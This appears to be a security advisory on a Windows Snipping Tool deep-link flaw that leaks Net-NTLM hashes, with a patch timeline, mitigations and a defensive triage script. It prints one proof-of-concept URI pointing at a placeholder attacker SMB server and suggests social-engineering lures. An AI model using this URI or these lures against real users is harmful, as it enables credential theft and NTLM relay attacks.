How the Windows Snipping Tool Leaks NTLM Hashes – PoC Code Revealed
A new vulnerability in the Windows Snipping Tool, CVE-2026-33829, lets attackers capture Net-NTLM hash credentials through a malicious deep-link URI. A simple PoC demonstrates the issue, and Microsoft's 14 April 2026 patch and the recommended mitigation steps are detailed below.
Vulnerability Exploitation Principle
The Snipping Tool registers the ms-screensketch deep-link URI scheme but does not properly validate the file path it receives, so an attacker can supply a UNC path that points to an SMB server they control. When the link is opened, Windows attempts an authenticated SMB connection to that server and automatically sends the user's Net-NTLM hash (the NTLM challenge-response value) to the attacker.
Windows Snipping Tool PoC Details
The PoC requires only a malicious URL or an HTML page that triggers the deep link. The following URI demonstrates the attack:
ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast
When a victim opens this link, the Snipping Tool launches, silently attempts to load the remote image over SMB, and Windows sends the Net-NTLM authentication response to the attacker. The captured hash can be cracked offline or used in NTLM relay attacks against internal resources.
Because the tool opens as expected, the attack can be disguised as a legitimate request to edit a corporate wallpaper, employee badge photo, or HR document. An attacker may register a domain such as snip.example.com to serve benign-looking image URLs that embed the malicious deep-link payload.
Patch Release and Timeline
Microsoft fixed the issue in the Patch Tuesday update on 14 April 2026. The disclosure timeline is:
23 March 2026 – vulnerability reported to Microsoft.
14 April 2026 – security patch released.
14 April 2026 – coordinated public advisory and PoC publication.
Users of affected Windows versions should apply the 14 April 2026 update immediately. Security teams should also monitor for unusual outbound SMB connections (TCP port 445) to external or unknown hosts, which may indicate active exploitation. Blocking outbound SMB traffic at the network perimeter remains an effective mitigation.
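Alongside the outbound-SMB monitoring above, defenders can triage the deep links themselves before a user ever clicks one. The following is an added example (not code from the original post or from Microsoft) that parses ms-screensketch URIs as seen in mail or proxy logs and flags filePath values pointing at UNC hosts outside an internal allowlist; the allowlist entries and sample URIs are constructed.

```python
"""Defender-side triage of ms-screensketch deep links (added example, not the
original post's code). Assumes a mail or web gateway hands candidate URIs to
triage(); the internal host allowlist below is a constructed sample."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample allowlist: where image files may legitimately live over SMB.
INTERNAL_SUFFIXES = (".corp.example",)
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# \\host\share\... or //host/share/... (Windows accepts either separator)
UNC_HOST_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)(?:[\\/]|$)")


def unc_host(path: str):
    """Host part of a UNC path, or None for local paths such as C:\\foo.png."""
    m = UNC_HOST_RE.match(path.strip())
    return m.group(1).lower() if m else None


def is_internal(host: str) -> bool:
    """True if the host is on the constructed allowlist (DNS suffix or RFC1918)."""
    try:
        return any(ipaddress.ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:
        return host.endswith(INTERNAL_SUFFIXES)


def triage(uri: str) -> dict:
    """Classify one URI: ignore / no-filepath / local-path / internal-unc / suspicious."""
    parts = urlsplit(uri.strip())
    if parts.scheme != "ms-screensketch":
        return {"verdict": "ignore", "host": None}
    # parse_qs decodes %5C back to a backslash, so percent-encoded UNC paths are caught too.
    params = parse_qs(parts.query)
    file_path = params.get("filePath", [""])[0]
    if not file_path:
        return {"verdict": "no-filepath", "host": None}
    host = unc_host(file_path)
    if host is None:
        return {"verdict": "local-path", "host": None}
    if is_internal(host):
        return {"verdict": "internal-unc", "host": host}
    # Remote UNC to an unknown host: opening this link would trigger SMB authentication.
    return {"verdict": "suspicious", "host": host}
```

A "suspicious" verdict is a good trigger for quarantining the message and correlating with any outbound port 445 attempts from the recipient's workstation.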